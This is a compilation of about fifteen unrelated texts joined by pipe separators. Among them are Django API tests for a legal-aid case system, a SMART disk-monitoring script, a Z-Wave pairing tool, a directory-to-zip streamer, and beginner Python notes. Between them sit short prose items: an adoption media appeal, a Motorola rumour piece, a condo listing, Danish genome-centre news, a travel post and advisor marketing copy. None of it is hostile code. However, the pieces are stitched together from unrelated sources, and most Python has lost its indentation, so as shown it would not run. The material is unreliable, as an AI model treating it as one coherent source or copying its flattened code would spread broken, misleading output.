"title": "MR",
"full_name": "John Doe",
"postcode": "SW1H 9AJ",
"street": "102 Petty France",
"mobile_phone": "0123456789",
"home_phone": "9876543210",
}
class CaseTestCase(BaseCaseTestCase):
def test_methods_not_allowed(self):
"""
Ensure that we can't POST, PUT or DELETE
"""
# LIST
self._test_delete_not_allowed(self.list_url)
# CREATE
def test_create_no_data(self):
"""
CREATE should raise validation error when data is empty
"""
response = self.client.post(self.list_url, data={}, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertItemsEqual(response.data.keys(), ["personal_details"])
self.assertEqual(Case.objects.count(), 0)
def test_create_with_data(self):
check = make_recipe("legalaid.eligibility_check")
data = {
"eligibility_check": unicode(check.reference),
"personal_details": self.get_personal_details_default_post_data(),
}
response = self.client.post(self.list_url, data=data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertCaseResponseKeys(response)
self.assertCaseEqual(
response.data,
Case(
reference=response.data["reference"],
eligibility_check=check,
personal_details=PersonalDetails(**data["personal_details"]),
),
)
# test that the Case is in the db and created by 'web' user
self.assertEqual(Case.objects.count(), 1)
case = Case.objects.first()
self.assertEqual(case.created_by.username, "web")
# test that the log is in the db and created by 'web' user
self.assertEqual(Log.objects.count(), 1)
log = Log.objects.first()
self.assertEqual(log.created_by.username, "web")
# no email sent
self.assertEquals(len(mail.outbox), 0)
def _test_method_in_error(self, method, url):
"""
Generic method called by 'create' and 'patch' to test against validation
errors.
"""
invalid_uuid = str(uuid.uuid4())
data = {
"eligibility_check": invalid_uuid,
"personal_details": {
"title": "1" * 21,
"full_name": None,
"postcode": "1" * 13,
"street": "1" * 256,
"mobile_phone": "1" * 21,
"home_phone": "1" * 21,
},
}
method_callable = getattr(self.client, method)
response = method_callable(url, data, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
errors = response.data
self.assertItemsEqual(errors.keys(), ["eligibility_check", "personal_details"])
self.assertEqual(errors["eligibility_check"], [u"Object with reference=%s does not exist." % invalid_uuid])
self.assertItemsEqual(
errors["personal_details"],
[
{
"title": [u"Ensure this value has at most 20 characters (it has 21)."],
"postcode": [u"Ensure this value has at most 12 characters (it has 13)."],
"street": [u"Ensure this value has at most 255 characters (it has 256)."],
"mobile_phone": [u"Ensure this value has at most 20 characters (it has 21)."],
"home_phone": [u"Ensure this value has at most 20 characters (it has 21)."],
}
],
)
def test_create_in_error(self):
self._test_method_in_error("post", self.list_url)
def test_cannot_create_with_other_reference(self):
"""
Cannot create a case passing an eligibility check reference already assigned
to another case
"""
# create a different case
case = make_recipe("legalaid.case")
data = {
"eligibility_check": unicode(case.eligibility_check.reference),
"personal_details": self.get_personal_details_default_post_data(),
}
response = self.client.post(self.list_url, data=data, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertDictEqual(
response.data, {"eligibility_check": [u"Case with this Eligibility check already exists."]}
)
def test_case_serializer_with_dupe_eligibility_check_reference(self):
case = make_recipe("legalaid.case")
data = {
u"eligibility_check": case.eligibility_check.reference,
u"personal_details": self.get_personal_details_default_post_data(),
}
serializer = CaseSerializer(data=data)
self.assertFalse(serializer.is_valid())
self.assertDictEqual(
serializer.errors, {"eligibility_check": [u"Case with this Eligibility check already exists."]}
)
class CallMeBackCaseTestCase(BaseCaseTestCase):
@property
def _default_dt(self):
if not hasattr(self, "__default_dt"):
self.__default_dt = datetime.datetime(2015, 3, 30, 10, 0, 0, 0).replace(tzinfo=timezone.utc)
return self.__default_dt
def test_create_with_callmeback(self):
self.assertEquals(len(mail.outbox), 0)
check = make_recipe("legalaid.eligibility_check")
data = {
"eligibility_check": unicode(check.reference),
"personal_details": self.get_personal_details_default_post_data(),
"requires_action_at": self._default_dt.isoformat(),
}
with mock.patch(
"cla_common.call_centre_availability.current_datetime",
return_value=datetime.datetime(2015, 3, 23, 10, 0, 0, 0),
):
response = self.client.post(self.list_url, data=data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertCaseResponseKeys(response)
case = Case.objects.first()
self.assertEqual(case.requires_action_at, self._default_dt)
self.assertEqual(case.callback_attempt, 1)
self.assertEqual(case.outcome_code, "CB1")
self.assertEqual(case.source, CASE_SOURCE.WEB)
self.assertEqual(case.log_set.count(), 2)
self.assertEqual(case.log_set.filter(code="CB1").count(), 1)
log = case.log_set.get(code="CB1")
self.assertEqual(
log.notes,
"Callback scheduled for %s - %s. "
% (
timezone.localtime(self._default_dt).strftime("%d/%m/%Y %H:%M"),
(timezone.localtime(self._default_dt) + datetime.timedelta(minutes=30)).strftime("%H:%M"),
),
)
_dt = timezone.localtime(self._default_dt)
expected_sla_72h = datetime.datetime(2015, 4, 7, 13, 30, 0, 0)
self.assertDictEqual(
log.context,
{
"requires_action_at": _dt.isoformat(),
"sla_120": (_dt + datetime.timedelta(minutes=120)).isoformat(),
"sla_480": (_dt + datetime.timedelta(hours=8)).isoformat(),
"sla_15": (_dt + datetime.timedelta(minutes=15)).isoformat(),
"sla_30": (_dt + datetime.timedelta(minutes=30)).isoformat(),
"sla_72h": timezone.make_aware(expected_sla_72h, _dt.tzinfo).isoformat(),
},
)
# checking email
self.assertEquals(len(mail.outbox), 1)
def test_create_should_ignore_outcome_code(self):
"""
Here only to check backward incompatibility
"""
check = make_recipe("legalaid.eligibility_check")
data = {
"eligibility_check": unicode(check.reference),
"personal_details": self.get_personal_details_default_post_data(),
"requires_action_at": self._default_dt.isoformat(),
"outcome_code": "TEST",
}
response = self.client.post(self.list_url, data=data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertCaseResponseKeys(response)
case = Case.objects.first()
self.assertNotEqual(case.outcome_code, "TEST")
|
We frequently receive enquiries from the media wanting to interview adoptive families and prospective adopters.
We are looking for all types of stories from prospective adopters at the start of the process to those who are several years into an adoption.
Your story can be a positive one or focus on some of the challenges you've faced as an adopter.
Sharing your story is a great way to raise awareness about the joys and challenges of adoption to a wider audience. Telling the media about what it's like to go through the adoption process first hand really helps us by giving our media work credibility and human interest.
The contribution media volunteers make to our work is extremely valuable and we do everything we can to ensure you feel comfortable and confident talking to the media.
|
from unittest import TestCase
import numpy as np
from toybox.tools import *
class TestCheckPoint(TestCase):
def test_valid_point(self):
point = (2, 3)
check_point(point)
def test_valid_point_with_intensity(self):
point = (2, 3, 1.)
check_point(point)
def test_check_3d_point(self):
point = (0., 1., 0., 1.)
with self.assertRaises(ValueError):
check_point(point)
def test_check_invalid_point(self):
point = (0., 'bad value')
with self.assertRaises(ValueError):
check_point(point)
class TestCheckPoints(TestCase):
def test_single_point(self):
point = ((2, 3, None),)
check_points(point)
class TestSortPoints(TestCase):
def test_sort_points(self):
points = np.array([
[1., 1.],
[2., 2.],
[1., 2.],
])
result = sort_points(points)
np.testing.assert_array_almost_equal(result, points)
def test_sort_points_with_zero(self):
points = np.array([
[1., 0.],
[0., 0.]
])
expected = np.array([
[0., 0.],
[1., 0.]
])
result = sort_points(points)
np.testing.assert_array_almost_equal(result, expected)
|
As you all know, Motorola manufactures Droid phones for Verizon. So with all the hype regarding the highly customizable Moto X, we were eager to know what’s next from Moto.
And now there is an official clue about the next-gen Moto product.
Verizon, via its DroidLanding Twitter account, has given away some sketchy details of a possible new gen Motorola device that would come riding the carrier.
And if we are considering the current hints available before us, the next Droid device could be a Motorola tablet. We have not much information regarding the next step from the handset manufacturer at the moment, though.
Moto X is at present the best option for somebody looking to buy a smartphone in terms of usability and customizability. The impressive device comes with scratch-resistant Corning Gorilla Glass and a dual-core Qualcomm Snapdragon processor.
The power-packed handset sports an AMOLED display and runs Android version 4.3. Moto X leads other smartphones in its range not only in customization, but also in performance.
We can expect the rumored Moto DROID device to have some nice features to please users.
Verizon has been using DroidLanding as its online promotional medium for some time. Now it is teasing the device in the form of a four-minute video, which gives clues about the forthcoming tablet.
If the Motorola DROID tablet from Verizon turns out to be real, we can look forward to a smart, attractively featured slate coming our way.
|
#!/usr/bin/env python
#
# Script to get SMART DATA from a FreeBSD based system (ie FreeNAS). Write to csv. Can be called from munin plugin SSH__FreeNAS_HDDTemp
#
'''Import SATA SMART DATA'''
#import handy commands
import os
import sys
import re
import time
import datetime
import csv
smart_device_table=[]
smart_devices = []
current_unix_time = int(time.time())
#just to keep it quiet in testing
def fnGetSmartData():
smart_device_info=[]
#get list of devices in system
smart_list_devices_raw=os.popen("smartctl --scan").read().split('\n')
#print smart_list_devices_raw
#
for index, line in enumerate(smart_list_devices_raw):
line=line.split(' ')
        if index < len(smart_list_devices_raw) - 1:
#print "index:", index, "line", line[0],line[5]
append_data = line[0],line[5]
smart_devices.append(append_data)
#get data for each device detected
#
#SMART 5 Reallocated_Sector_Count.
    #SMART 187 Reported_Uncorrectable_Errors.
    #SMART 188 Command_Timeout.
    #SMART 197 Current_Pending_Sector_Count.
    #SMART 198 Offline_Uncorrectable.
#get name, serial number etc
for slashdevid in smart_devices:
device_model = "-1"
device_serial = "-2"
device_health = "-3"
device_firmware_version = "-4"
device_capacity = "-5"
device_hrs = "-6"
device_tempC = "-7"
device_sscount = "-8"
device_5reallocate = "-05"
device_198OfflineUncorrectable = "-198"
device_187ReportedUncorrectableErrors = "-187"
device_188CommandTimeout = "-188"
device_197CurrentPendingSector = "-197"
#print "slash", slashdevid
#print "slash0", slashdevid[0]
slashid=slashdevid[0]
        #use slashid rather than ada1 to make this work
smart_device_data=os.popen("smartctl -a " + slashdevid[0] ).read().split('\n')
#print "raw", smart_device_data
#print "rawline:", smart_device_name
#scan through smart_device_data for name field
for index, item in enumerate(smart_device_data):
#print 'raw item', item
if "Device Model" in item:
device_model = item[18:]
#print "device_model", device_model
if "Firmware Version:" in item:
device_firmware_version = item[17:]
#print "device firmware:", device_firmware_version
if "Serial" in item:
device_serial = item[17:]
#print "device serial:", device_serial
if "SMART overall-health self-assessment" in item:
device_health = item.split (":")
device_health = device_health[1]
#print "Smart health", device_health
if "User Capacity" in item:
device_capacity = item.split("[")
device_capacity = device_capacity[1].replace("]", "")
#print "device_capacity", device_capacity
if "Power_On_Hours" in item:
device_hrs = item.split(" ")
device_hrs = device_hrs[43:][0]
#print "Power on hrs", device_hrs
if "4 Start_Stop_Count" in item:
device_sscount = item.split(" ")
device_sscount = device_sscount[-1]
#print "Start_stop_Count", device_sscount
#THE FOLLOWING ARE KEY INDICATORS OF FAILURE (or recorded cause it can be)
#https://www.backblaze.com/blog/hard-drive-smart-stats/
#SMART 5 - Reallocated sector count
if "5 Reallocate" in item:
device_5reallocate = item.split(" ")
device_5reallocate = device_5reallocate[-1]
#print "Reallocated", device_5reallocate
#SMART 187 Reported Uncorrectable Errors
if item.startswith("187 Reported"):
device_187ReportedUncorrectableErrors = item.split(" ")
device_187ReportedUncorrectableErrors = device_187ReportedUncorrectableErrors[-1]
#print "Reported Uncorrectable errors (187):", device_187ReportedUncorrectableErrors
#SMART 188 Command Timeout
if item.startswith("188 Command"):
device_188CommandTimeout = item.split(" ")
device_188CommandTimeout = device_188CommandTimeout[-1]
#print "Command Timeout (188):", device_188CommandTimeout
#SMART 197 Current Pending Sector Count
if item.startswith("197 Current_Pending_Sector"):
device_197CurrentPendingSector = item.split(" ")
device_197CurrentPendingSector = device_197CurrentPendingSector[-1]
#print "Current Pending Sector (197):", device_197CurrentPendingSector
if "Temperature_Celsius" in item:
device_tempC = item.split("(")
device_tempC = device_tempC[0]
device_tempC = device_tempC.split(" ")
device_tempC = device_tempC[-2]
#print "Temperature_Celsius", device_tempC
if "198 Offline_Uncorrectable" in item:
device_198OfflineUncorrectable = item.split(" ")
device_198OfflineUncorrectable = device_198OfflineUncorrectable[-1]
#print "Offline_Uncorrectable (198)", device_198OfflineUncorrectable
# Need to think about device statistics - ie GP04.
# - Device bytes written (logical blocks written/read to TB)
# - Device io commands completed, Lifetime, per hr average.
append_data = slashdevid[0],device_model, device_serial, device_health, device_firmware_version, device_capacity, device_hrs, device_tempC, device_sscount, device_5reallocate, device_187ReportedUncorrectableErrors,device_188CommandTimeout,device_198OfflineUncorrectable,
smart_device_info.append(append_data)
return smart_device_info
def fnExportToCSV(smart_device_table,filename):
#export pool data
with open (filename, 'w') as csvfile:
writeout = csv.writer(csvfile, quoting=csv.QUOTE_NONE)
for line in smart_device_table:
writeout.writerow(line)
#Run the bits we need:
smart_device_table = fnGetSmartData()
fnExportToCSV(smart_device_table,"/root/temp/monitoring/smartsatadata.txt")
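Reading the exported CSV back is straightforward as long as the column order matches the `append_data` tuple built above; a minimal reader sketch (the `FIELDS` labels are my own shorthand for those columns, not names from the script):

```python
import csv
import io

# One label per element of the append_data tuple built above.
FIELDS = ['device', 'model', 'serial', 'health', 'firmware', 'capacity',
          'power_on_hours', 'temp_c', 'start_stop_count', 'smart_5',
          'smart_187', 'smart_188', 'smart_198']

def parse_smart_csv(text):
    rows = []
    for line in csv.reader(io.StringIO(text)):
        if line:  # skip any blank lines the writer may emit
            rows.append(dict(zip(FIELDS, line)))
    return rows

sample = "/dev/ada0,ST4000DM000,Z301ABCD, PASSED,CC52,4.00 TB,12345,34,120,0,0,0,0\n"
row = parse_smart_csv(sample)[0]
print(row['device'], row['temp_c'])  # → /dev/ada0 34
```

A munin plugin reading this file can then graph `temp_c` per device, which is the use case named in the header comment.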
|
234 Afton Sq #103 is located in the Oasis At Pearl Lake A Condo neighborhood in Altamonte Springs, FL. This residential property for sale is currently offered at $78,000. Built in 1988, this 1-bedroom, 1-bathroom Central Florida residential property has been listed on RealtyInOrlando.com for 83 days. 234 Afton Sq #103 is priced at $116 per square foot and is situated on 0.01 acres of land. Homeowner association fees in Oasis At Pearl Lake A Condo are $204 per month. Please contact your local Realtor® for more information on 234 Afton Sq #103, Altamonte Springs, Florida 32714. Property Listing Reference: MLS number: O5737109.
|
#!/usr/bin/python3
# Copyright 2016 Robert Muth <robert@muth.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 3
# of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
Example command line tool for pairing/unpairing
"""
import argparse
# python import
import logging
import sys
import time
from typing import Tuple
from pyzwaver import zwave as z
from pyzwaver.command import StringifyCommand
from pyzwaver.command_translator import CommandTranslator
from pyzwaver.controller import Controller
from pyzwaver.driver import Driver, MakeSerialDevice
from pyzwaver.node import Nodeset
from pyzwaver.zmessage import ControllerPriority
XMIT_OPTIONS_NO_ROUTE = (z.TRANSMIT_OPTION_ACK |
z.TRANSMIT_OPTION_EXPLORE)
XMIT_OPTIONS = (z.TRANSMIT_OPTION_ACK |
z.TRANSMIT_OPTION_AUTO_ROUTE |
z.TRANSMIT_OPTION_EXPLORE)
XMIT_OPTIONS_SECURE = (z.TRANSMIT_OPTION_ACK |
z.TRANSMIT_OPTION_AUTO_ROUTE)
class TestListener(object):
"""
Demonstrates how to hook into the stream of messages
sent to the controller from other nodes
"""
def __init__(self):
pass
def put(self, n, ts, key, values):
name = "@NONE@"
if key[0] is not None:
name = StringifyCommand(key)
logging.warning("RECEIVED [%d]: %s - %s", n, name, values)
class NodeUpdateListener(object):
def put(self, n, _ts, key, values):
print("RECEIVED ", n, key, values)
def ControllerEventCallback(action, event, node):
print(action, event, node)
def InitController(args, update_routing=False) -> Tuple[Driver, Controller]:
logging.info("opening serial: [%s]", args.serial_port)
device = MakeSerialDevice(args.serial_port)
driver = Driver(device)
controller = Controller(driver, pairing_timeout_secs=args.pairing_timeout_sec)
controller.Initialize()
controller.WaitUntilInitialized()
if update_routing:
controller.UpdateRoutingInfo()
driver.WaitUntilAllPreviousMessagesHaveBeenHandled()
print(controller.StringBasic())
if update_routing:
print(controller.StringRoutes())
# print(controller.props.StringApis())
return driver, controller
def cmd_neighbor_update(args):
driver, controller = InitController(args)
for n in controller.nodes:
if n == controller.GetNodeId(): continue
if n in controller.failed_nodes: continue
controller.NeighborUpdate(n, ControllerEventCallback)
driver.WaitUntilAllPreviousMessagesHaveBeenHandled()
driver.Terminate()
def cmd_pair(args):
driver, controller = InitController(args)
controller.StopAddNodeToNetwork(ControllerEventCallback)
controller.AddNodeToNetwork(ControllerEventCallback)
controller.StopAddNodeToNetwork(ControllerEventCallback)
driver.Terminate()
def cmd_secure_pair(args):
# experimental - make sure you enable security in node.py
driver, controller = InitController(args)
translator = CommandTranslator(driver)
translator.AddListener(TestListener())
nodeset = Nodeset(translator, controller.GetNodeId())
controller.StopAddNodeToNetwork(ControllerEventCallback)
time.sleep(1.0)
controller.AddNodeToNetwork(ControllerEventCallback)
controller.StopAddNodeToNetwork(ControllerEventCallback)
time.sleep(5.0)
# driver.Terminate()
def cmd_unpair(args):
driver, controller = InitController(args)
controller.StopRemoveNodeFromNetwork(None)
time.sleep(1.0)
controller.RemoveNodeFromNetwork(ControllerEventCallback)
controller.StopRemoveNodeFromNetwork(None)
time.sleep(1.0)
driver.Terminate()
def cmd_hard_reset(args):
driver, controller = InitController(args)
controller.SetDefault()
driver.Terminate()
def cmd_controller_details(args):
driver, controller = InitController(args, True)
driver.Terminate()
def cmd_set_basic_multi(args):
driver, controller = InitController(args, True)
translator = CommandTranslator(driver)
logging.info("sending command to %s", args.node)
translator.SendMultiCommand(args.node,
z.Basic_Set,
{"level": args.level},
ControllerPriority(),
XMIT_OPTIONS
)
driver.Terminate()
def cmd_get_basic(args):
driver, controller = InitController(args, True)
translator = CommandTranslator(driver)
translator.AddListener(NodeUpdateListener())
for n in args.node:
translator.SendCommand(n,
z.Basic_Get,
{},
ControllerPriority(),
XMIT_OPTIONS)
time.sleep(2)
driver.Terminate()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--verbosity", type=int, default=40,
help="logging level (lower values are more verbose)")
parser.add_argument("--pairing_timeout_sec", type=int, default=30,
help="(un)pairing timeout")
parser.add_argument("--serial_port", type=str, default="/dev/ttyUSB0",
help='The USB serial device representing the Z-Wave controller stick. '
'Common settings are: /dev/ttyUSB0, /dev/ttyACM0')
subparsers = parser.add_subparsers(help="sub-commands")
s = subparsers.add_parser("pair", help="Pair a Z-wave node")
s.set_defaults(func=cmd_pair)
s = subparsers.add_parser("secure_pair", help="Securely pair a Z-wave node")
s.set_defaults(func=cmd_secure_pair)
s = subparsers.add_parser("unpair", help="Unpair a Z-wave node")
s.set_defaults(func=cmd_unpair)
s = subparsers.add_parser("hard_reset", help="Factory reset Z-wave controller")
s.set_defaults(func=cmd_hard_reset)
s = subparsers.add_parser("controller_details", help="Show Z-wave controller details")
s.set_defaults(func=cmd_controller_details)
s = subparsers.add_parser("set_basic_multi", help="Send multicast BasicSet command")
s.set_defaults(func=cmd_set_basic_multi)
s.add_argument("--level", type=int, default=99, help="level to set")
s.add_argument('--node', type=int, nargs='+', help="dest node(s) - separate multiple nodes with spaces")
s = subparsers.add_parser("get_basic", help="Run BasicGet command")
s.set_defaults(func=cmd_get_basic)
s.add_argument('--node', type=int, nargs='+', help="dest node(s) - separate multiple nodes with spaces")
s = subparsers.add_parser("neighbor_update", help="Update Node Neighborhoods")
s.set_defaults(func=cmd_neighbor_update)
args = parser.parse_args()
logging.basicConfig(level=args.verbosity)
if "func" in args:
print(args)
args.func(args)
else:
# we should not reach here but there seems to be a bug
parser.error("No command specified - try -h option")
return 0
if __name__ == "__main__":
sys.exit(main())
|
Based on an application by Denmark’s Ministry of Health, the Board of Directors of the Novo Nordisk Foundation has approved a framework grant of DKK 990 million (€133 million) over 4.5 years for establishing and operating the infrastructure of the National Genome Centre. The Foundation has awarded DKK 102 million of this to begin setting up the Centre’s data and information technology unit immediately in 2019.
In addition, the Foundation has awarded a grant of DKK 30 million to enable the Ministry to involve leading experts from Denmark and elsewhere in preparing a resilient project plan for establishing and operating the infrastructure of the Centre.
The goal is for Denmark to become one of the leading countries in this field, improving both the treatment and prevention of disease.
As a result of the initiative, genome sequencing facilities will be established in Aarhus and in Copenhagen as specified in the Ministry’s application. The Ministry expects that about 60,000 people will undergo whole-genome sequencing in the first 5 years of the Centre. The sequencing and data processing will be based at public institutions, and the Centre will give highest priority to security in storing and using the data in a central national database. An interpretation unit will support doctors in using the data to benefit patients.
The National Genome Centre is an independent organization under Denmark’s Ministry of Health. The Centre will be a hub for the visionary and balanced development of genomic medicine in Denmark. The Government of Denmark allocated DKK 100 million (€13 million) in the 2017 Finance Act to co-finance the work with personalized medicine for 2017–2020.
The Centre’s task is to develop and operate a unified nationwide infrastructure for processing genetic information.
An important goal for the Centre is to collaborate with the healthcare system in all five administrative regions to create the basis for improving diagnosis and targeted treatment to benefit each individual patient.
|
import io
import os
import zipfile


class ZipStream:
    """Stream a directory as a zip archive in chunks, without building the
    whole archive in memory."""
    def __init__(self, dir_path):
        self.dir_path = dir_path
        self.pos = 0
        self.buff_pos = 0
        self.buff = io.BytesIO()
        # zipfile writes archive bytes back into this object via write()
        self.zf = zipfile.ZipFile(self, 'w', zipfile.ZIP_DEFLATED, allowZip64=True)
        self.file_list = self.getFileList()
    def getFileList(self):
        # generator yielding (absolute path, archive-relative path) pairs;
        # the zip central directory is written once the walk is exhausted
        for root, dirs, files in os.walk(self.dir_path):
            for file in files:
                file_path = os.path.join(root, file)
                relative_path = os.path.join(os.path.relpath(root, self.dir_path), file)
                yield file_path, relative_path
        self.zf.close()
def read(self, size=60 * 1024):
for file_path, relative_path in self.file_list:
self.zf.write(file_path, relative_path)
if self.buff.tell() >= size:
break
self.buff.seek(0)
back = self.buff.read()
self.buff.truncate(0)
self.buff.seek(0)
self.buff_pos += len(back)
return back
def write(self, data):
self.pos += len(data)
self.buff.write(data)
def tell(self):
return self.pos
def seek(self, pos, whence=0):
if pos >= self.buff_pos:
self.buff.seek(pos - self.buff_pos, whence)
self.pos = pos
def flush(self):
pass
if __name__ == "__main__":
zs = ZipStream(".")
out = open("out.zip", "wb")
while 1:
data = zs.read()
print("Write %s" % len(data))
if not data:
break
out.write(data)
out.close()
|
Between my last post and this one, we traveled to Cincinnati and back.
Getting there was more of an adventure than normal. I woke up at 5 (to get to the airport by 6:30), but around 5:30 got a text message that the flight was delayed by 5 hours (until 1:00 pm). Not much fun, but not canceled, so we decided to go back to sleep. Around 8:30 we got another text message: the flight now left at 11 am. That didn't give us much time. We scrambled out of bed, headed to the offsite parking, and made it to the airport about 9:50, with plenty of time to spare.
The rest of the time was just visiting with family, we had a great time, but of course the visits are never long enough.
The way back was much easier: we left on time and landed in Seattle 45 minutes early.
Our next trip will be to Alaska and then we’ll be back in Cincinnati in July.
|
# Copyright (c) 2013-2015 University Corporation for Atmospheric Research/Unidata.
# Distributed under the terms of the MIT License.
# SPDX-License-Identifier: MIT
"""
================
NCSS Time Series
================
Use Siphon to query the NetCDF Subset Service for a timeseries.
"""
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
from netCDF4 import num2date
from siphon.catalog import TDSCatalog
###########################################
# First we construct a TDSCatalog instance pointing to our dataset of interest, in
# this case TDS' "Best" virtual dataset for the GFS global 0.5 degree collection of
# GRIB files. We see this catalog contains a single dataset.
best_gfs = TDSCatalog('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/GFS/'
'Global_0p5deg/catalog.xml?dataset=grib/NCEP/GFS/Global_0p5deg/Best')
print(best_gfs.datasets)
###########################################
# We pull out this dataset and get the NCSS access point
best_ds = best_gfs.datasets[0]
ncss = best_ds.subset()
###########################################
# We can then use the `ncss` object to create a new query object, which
# facilitates asking for data from the server.
query = ncss.query()
###########################################
# We construct a query asking for data corresponding to latitude 40N and longitude 105W,
# for the next 7 days. We also ask for NetCDF version 4 data, for the variable
# 'Temperature_isobaric', at the vertical level of 100000 Pa (approximately surface).
# This request will return all times in the range for a single point. Note the string
# representation of the query is a properly encoded query string.
now = datetime.utcnow()
query.lonlat_point(-105, 40).vertical_level(100000).time_range(now, now + timedelta(days=7))
query.variables('Temperature_isobaric').accept('netcdf')
###########################################
# We now request data from the server using this query. The `NCSS` class handles parsing
# this NetCDF data (using the `netCDF4` module). If we print out the variable names, we
# see our requested variables, as well as a few others (more metadata information)
data = ncss.get_data(query)
list(data.variables.keys())
###########################################
# We'll pull out the temperature and time variables.
temp = data.variables['Temperature_isobaric']
time = data.variables['time']
###########################################
# The time values are in hours relative to the start of the entire model collection.
# Fortunately, the `netCDF4` module has a helper function to convert these numbers into
# Python `datetime` objects. We can see the first 5 elements output by the function look
# reasonable.
time_vals = num2date(time[:].squeeze(), time.units)
print(time_vals[:5])
###########################################
# Now we can plot these up using matplotlib, which has ready-made support for `datetime`
# objects.
fig, ax = plt.subplots(1, 1, figsize=(9, 8))
ax.plot(time_vals, temp[:].squeeze(), 'r', linewidth=2)
ax.set_ylabel('{} ({})'.format(temp.standard_name, temp.units))
ax.set_xlabel('Forecast Time (UTC)')
ax.grid(True)
|
In March the Lewisham Down’s Friendship and Creativity Group (DFCG Lewisham) paid us a visit with a group of nearly 30 kids and parents. They are a voluntary community group for children and families, providing activity programmes that support the development and communication skills families and children need to form friendships. They took part in all types of activities. The volunteers are parent carers who support each other, new members, and parents who have received a diagnosis of DS pre- or postnatally. Volunteers help to organise, promote and oversee extracurricular activities, social activities and residentials.
|
class Tree():
""" implementation of a tree """
def __init__(self, cargo, left=None, right=None):
""" create a tree """
# can be any type
self.cargo = cargo
# should be also tree nodes
self.left = left
self.right = right
def __str__(self):
""" representation of a tree: tree.cargo """
return str(self.cargo)
def getCargo(self):
""" return the cargo of the tree """
return self.cargo
def getLeft(self):
""" return the left node of the tree """
return self.left
def getRight(self):
""" return the right node of the tree """
return self.right
def setLeft(self, left):
""" set the left node of the tree """
self.left = left
def setRight(self, right):
""" set the right node of the tree """
self.right = right
def setCargo(self, cargo):
""" set the cargo of the tree """
self.cargo = cargo
@staticmethod
def total(tree):
""" recursively sums the total cargos of a tree """
if tree is None: return 0
return tree.cargo + \
Tree.total(tree.left) + \
Tree.total(tree.right)
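A quick standalone check of the structure above (the class is repeated here in minimal form so the snippet runs on its own):

```python
class Tree:
    """Minimal restatement of the Tree class above."""
    def __init__(self, cargo, left=None, right=None):
        self.cargo = cargo
        self.left = left
        self.right = right

    @staticmethod
    def total(tree):
        """Recursively sum the cargo of every node."""
        if tree is None:
            return 0
        return tree.cargo + Tree.total(tree.left) + Tree.total(tree.right)

# build:    1
#          / \
#         2   3
#              \
#               4
root = Tree(1, Tree(2), Tree(3, None, Tree(4)))
print(Tree.total(root))  # 10
```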
|
Hiring a Mount Vernon financial advisor may be the key to getting your finances to where you want them, and to properly managing your money. We live in a country where residents are provided with a large number of financial opportunities. With countless banks, accounts, government programs and investments at your disposal, there is a lot that you can potentially do with your money. However, some Mount Vernon residents may find that it is difficult to effectively pick the right investments and opportunities. Choosing the right places to put your money can lead to gains, while making poor decisions can lead to losses. Rather than bouncing back and forth between losses and gains, hire an advisor to help you make the most of your income.
The financial world is one that can be fairly difficult to understand, and there are many different ways that a trained Mount Vernon financial advisor can help you with your money. By understanding the ways that you can receive help from an advisor, you can more effectively choose the New York advisors that will best fit your needs. The following are just a few of the different ways that you can receive help from a Mount Vernon financial advisor.
Some people may need the assistance of a Mount Vernon financial advisor in order to make large purchases that will have a big effect on their finances. Real estate is an example of such a purchase. When you buy a home in NY or elsewhere, you are going to be investing a large amount of money, and that investment is going to be controlled by a number of factors. Homeowners will need to find a good mortgage, an appropriate homeowners insurance policy, and will need to learn about property taxes and other expenses. With a financial advisor to help you with these important decisions, you should have no problem putting together a real estate purchase that will meet your needs.
Others are going to be searching for a Mount Vernon financial advisor that can help them with their savings. If you are currently saving for something like retirement, or a college education fund, you are likely aware of the difficulty that often comes with making these kinds of savings. Many people already have a hard time making ends meet with their paycheck, and the idea of saving large amounts of money can seem impossible. However, when you get professional assistance with managing your savings and various mixed investments, you should have a much easier time making your goals. NY advisors are going to be able to help you use different tools and programs to effectively budget and save for important life events.
Finally, many people may be looking to hire a Mount Vernon financial advisor to help them with important investments. One common investment that many people will make is that of life insurance. Whole life insurance and universal life insurance both come with a built in investment component, and a financial advisor can help you choose the best providers and policies, as well as a face value that will fit the needs of your family. Your expert should have a lot of experience with these and other kinds of investments, and can help you make your money go much further.
When you hire a Mount Vernon financial advisor, you do not want to simply rush out and hire the first advisor that you find. The individual that you employ is going to be dealing with sensitive financial matters, and you will want to find someone that is properly trained and educated. There are a number of different things that shoppers in Mount Vernon will want to look for in a New York professional.
In order to be certified to practice in Mount Vernon, a Mount Vernon financial advisor will have to meet a few different qualifications. First, they will need to have passed the appropriate certification tests. Also, a good financial advisor will need to have affiliated with a local firm, and will have to be licensed by NY state. If you locate Mount Vernon advisors that do not meet these requirements, you may be taking large risks by paying for their services. Make sure to do the proper research before making your decision.
In the past, people that were looking to hire a Mount Vernon financial advisor would have to call each of the individual firms and advisors in order to get quotes and information. Now, the process is much easier, and it will take you far less time to find the right options. Use the Internet resources that we offer here on this website to compare your choices, and then pick the New York advisors that will best fit your budget and your needs.
|
# ch03_notes.py
# Chapter 3 notes taken from Automate the Boring Stuff with Python (2015).pdf
# Created by Davidzz on 7/20/2016
# Functions:
# no parameters:
# define:
def hello():
print('Howdy!')
print('Howdy!!!')
print('Hello there.')
# call:
hello()
# with parameters:
# define:
def hello(name):
print('Hello ' + name + '!')
# call:
hello('David')
hello('Belinda')
# returns in functions
import random
def getRandomIntBetweenZeroAnd(num):
gen = random.randint(0, num)
return gen
for i in range(5):
string = str(getRandomIntBetweenZeroAnd(9))
print(string)
# null == None (N capitalized)
# printing to console
print('Pyt', end='')
print('hon')
print('Hello', 'world!')
